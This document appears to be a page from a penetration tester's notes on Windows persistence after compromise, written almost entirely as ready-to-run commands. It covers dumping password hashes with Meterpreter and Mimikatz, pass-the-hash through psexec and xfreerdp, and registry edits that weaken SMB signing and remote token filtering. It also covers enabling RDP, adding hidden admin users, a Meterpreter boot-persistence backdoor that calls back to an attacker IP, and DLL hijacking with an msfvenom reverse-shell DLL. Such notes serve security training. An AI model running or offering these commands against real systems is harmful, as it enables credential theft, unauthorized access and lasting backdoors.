Persistence

Maintain Access

  1. Password hash (Pass-the-Hash / Crack-the-Hash) --> Services

  2. Backdoor

  3. New users

Meterpreter - run hashdump

Dump hashes from SAM database:

run hashdump

Sometimes this will fail. Workaround: migrate!

Or we can use:

run post/windows/gather/smart_hashdump

Then in metasploit:

creds
loot

Pass-the-Hash in Metasploit

We may use psexec:

use exploit/windows/smb/psexec

And interestingly, we can use the password hash as SMBPass!

And of course, the account has to be admin one to use psexec.

Also, if a user is in the Administrators group, but not an actual administrator, we may get the error STATUS_ACCESS_DENIED. We have to make changes in the registry:

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System > Add a new DWORD (32-bit) LocalAccountTokenFilterPolicy and set the value to 1

  2. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters > Add a new DWORD (32-bit) RequireSecuritySignature and set the value to 0

Or in powershell:

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\LanManServer\Parameters -Name RequireSecuritySignature -Value 0 -Type DWord

Or use reg ...

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 0 /f

Pass-the-Hash via RDP

We may use xfreerdp in Kali Linux.

xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<target>

Mimikatz in Meterpreter

The best situation is that the target system is a 64-bit one. Also, do migrate Meterpreter to a 64-bit process. To find a good candidate, find 64-bit process with System privilege:

ps -A x86_64 -s
migrate <target_PID>

Then load Mimikatz:

load mimikatz

Retrieve credentials using wdigest:

wdigest

Enable RDP

To check if RDP is enabled:

net start

Or WMIC:

wmic service where 'Caption like "Remote%" and started=true' get Caption

Or in Meterpreter:

run service_manager -l
run post/windows/gather/enum_services

Then enable it. In Meterpreter:

run getgui -e

And of course the user has to be in the RDP group (Allow log on through Remote Desktop Services in local policy). In cmd:

net localgroup "Remote Desktop Users" <user> /add
# Or even ...
net localgroup "administrators" <user> /add

Then we can RDP using rdesktop:

rdesktop <ip_address> -u <user> -p <password>

Also, there is a little trick on shell. We can enable shell connection using TelnetClients group :)

Persistence in Meterpreter

Persistence module options:

-A:  Start handler locally
-X:  Start the agent at boot (need SYSTEM)
-i:  Connection attempt interval
-p:  Listening port
-r:  Local IP address

# Example:
run persistance -A -X -i 5 -p 8080 -r 172.16.10.5

The steps of creating this persistence:

  1. Create the payload using msfvenom

  2. Upload the backdoor

  3. Execute the backdoor

  4. Add entry in Windows Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xxxx

    reg setval -k HKLM\\SOFTWARE\\microsoft\\windows\\currentversion\\run -d "<path_to_backdoor>" -v <backdoor_name>

  5. Use multi/handler to get shell

Add new users

Add a new admin:

net user <user> <pass> /add
net group administrators <user> /add

DLL Hijacking / Preloading

Abuse DLL Search Order. When a program launches, the DLL Search Order is most likely to be:

  1. Directory of the executable

  2. C:\Windows\System32

  3. C:\windows\system

  4. C:\windows

  5. Current directory at the time of execution

  6. Directories in %PATH%

To search for opportunity of DLL Hijacking, use Process Monitor to inspect the DLL used by the processes.

  1. Create a procmon filter for a specific executable. Also create a filter for NAME NOT FOUND for result column so we can quickly filter on relevant entries.

  2. Identify the DLL in a directory which we have write/modify permission.

  3. Drop the modified payload in the writable directory

  4. Restart the service / Restart the application ... etc

Note that we can use msfvenom to generate DLL:

msfvenom -p windows/meterpreter/reverse_https LHOST=x.x.x.x LPORT=xxxx -f dll > payload.dll

PreviousPrivilege EscalationNextData Gathering

Last updated